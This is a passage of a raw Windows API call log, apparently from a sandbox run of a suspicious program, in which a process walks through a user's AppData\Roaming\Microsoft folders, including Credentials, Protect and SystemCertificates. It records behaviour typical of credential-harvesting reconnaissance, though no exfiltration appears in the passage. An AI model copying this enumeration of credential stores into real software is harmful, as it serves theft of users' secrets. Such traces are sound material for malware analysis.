dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0207.402] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Network", cAlternateFileName="")) returned 1 [0207.402] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28666ef0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2b32ecd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2b32ecd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office", cAlternateFileName="")) returned 1 [0207.402] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x500531d0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x5b267fb0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x5b267fb0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook", cAlternateFileName="")) returned 1 [0207.402] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42694660, ftCreationTime.dwHighDateTime=0x1d7b065, ftLastAccessTime.dwLowDateTime=0x42694660, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x42694660, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof", cAlternateFileName="")) returned 1 [0207.402] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795d9e30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x30b088f0, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x30b088f0, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Protect", cAlternateFileName="")) returned 1 [0207.402] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemCertificates", cAlternateFileName="SYSTEM~1")) returned 1 [0207.403] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x21509730, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3e1d8b20, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x3e1d8b20, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0207.403] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x426ba7c0, ftCreationTime.dwHighDateTime=0x1d7b065, ftLastAccessTime.dwLowDateTime=0x426ba7c0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x426ba7c0, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UProof", cAlternateFileName="")) returned 1 [0207.403] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf96b9c4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0207.403] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x286ff470, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x286ff470, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x286ff470, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Word", cAlternateFileName="")) returned 1 [0207.403] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x286ff470, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x286ff470, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x286ff470, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Word", cAlternateFileName="")) returned 0 [0207.403] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0207.403] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed24) returned 1 [0207.403] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ef84) returned 1 [0207.403] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef30) returned 1 [0207.403] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft", nBufferLength=0x105, lpBuffer=0x38ea10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft", lpFilePart=0x0) returned 0x2c [0207.403] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\*", lpFindFileData=0x38ece0 | out: lpFindFileData=0x38ece0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x426ba7c0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x426ba7c0, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x55b8a68 [0207.404] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x426ba7c0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x426ba7c0, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.404] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3b3af0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3b3af0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3b3af0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AddIns", cAlternateFileName="")) returned 1 [0207.404] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x285f4ad0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x285f4ad0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bibliography", cAlternateFileName="BIBLIO~1")) returned 1 [0207.404] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0207.404] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x160a67d7, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Crypto", cAlternateFileName="")) returned 1 [0207.404] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28986bd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x28986bd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x28986bd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Document Building Blocks", cAlternateFileName="DOCUME~1")) returned 1 [0207.404] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3d9c50, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3d9c50, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3d9c50, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Excel", cAlternateFileName="")) returned 1 [0207.404] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795fff90, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfda27f60, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0207.404] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Network", cAlternateFileName="")) returned 1 [0207.404] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28666ef0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2b32ecd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2b32ecd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office", cAlternateFileName="")) returned 1 [0207.404] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x500531d0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x5b267fb0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x5b267fb0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook", cAlternateFileName="")) returned 1 [0207.404] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42694660, ftCreationTime.dwHighDateTime=0x1d7b065, ftLastAccessTime.dwLowDateTime=0x42694660, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x42694660, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof", cAlternateFileName="")) returned 1 [0207.404] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795d9e30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x30b088f0, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x30b088f0, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Protect", cAlternateFileName="")) returned 1 [0207.405] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemCertificates", cAlternateFileName="SYSTEM~1")) returned 1 [0207.405] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x21509730, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3e1d8b20, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x3e1d8b20, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0207.405] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x426ba7c0, ftCreationTime.dwHighDateTime=0x1d7b065, ftLastAccessTime.dwLowDateTime=0x426ba7c0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x426ba7c0, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UProof", cAlternateFileName="")) returned 1 [0207.405] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf96b9c4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0207.405] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x286ff470, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x286ff470, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x286ff470, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Word", cAlternateFileName="")) returned 1 [0207.405] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0207.405] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0207.405] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eca0) returned 1 [0207.405] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ef00) returned 1 [0207.405] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\AddIns", nBufferLength=0x105, lpBuffer=0x38ea3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\AddIns", lpFilePart=0x0) returned 0x33 [0207.405] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef20) returned 1 [0207.405] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\AddIns", nBufferLength=0x105, lpBuffer=0x38ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\AddIns", lpFilePart=0x0) returned 0x33 [0207.406] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\AddIns\\*", lpFindFileData=0x38ecd0 | out: lpFindFileData=0x38ecd0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3b3af0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3b3af0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3b3af0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x55b8a68 [0207.407] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3b3af0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3b3af0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3b3af0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.407] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3b3af0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3b3af0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3b3af0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0207.407] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0207.407] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ec90) returned 1 [0207.407] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eef0) returned 1 [0207.407] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography", nBufferLength=0x105, lpBuffer=0x38ea3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography", lpFilePart=0x0) returned 0x39 [0207.407] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef20) returned 1 [0207.407] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography", nBufferLength=0x105, lpBuffer=0x38ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography", lpFilePart=0x0) returned 0x39 [0207.407] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\*", lpFindFileData=0x38ecd0 | out: lpFindFileData=0x38ecd0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x285f4ad0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x285f4ad0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x55b8a68 [0207.445] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x285f4ad0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x285f4ad0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.445] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2861ac30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2861ac30, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Style", cAlternateFileName="")) returned 1 [0207.446] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2861ac30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2861ac30, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Style", cAlternateFileName="")) returned 0 [0207.446] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0207.446] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ec90) returned 1 [0207.446] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eef0) returned 1 [0207.446] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Credentials", nBufferLength=0x105, lpBuffer=0x38ea3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Credentials", lpFilePart=0x0) returned 0x38 [0207.446] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef20) returned 1 [0207.446] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Credentials", nBufferLength=0x105, lpBuffer=0x38ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Credentials", lpFilePart=0x0) returned 0x38 [0207.447] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Credentials\\*", lpFindFileData=0x38ecd0 | out: lpFindFileData=0x38ecd0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x55b8a68 [0207.447] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.447] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0207.447] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0207.447] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ec90) returned 1 [0207.447] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eef0) returned 1 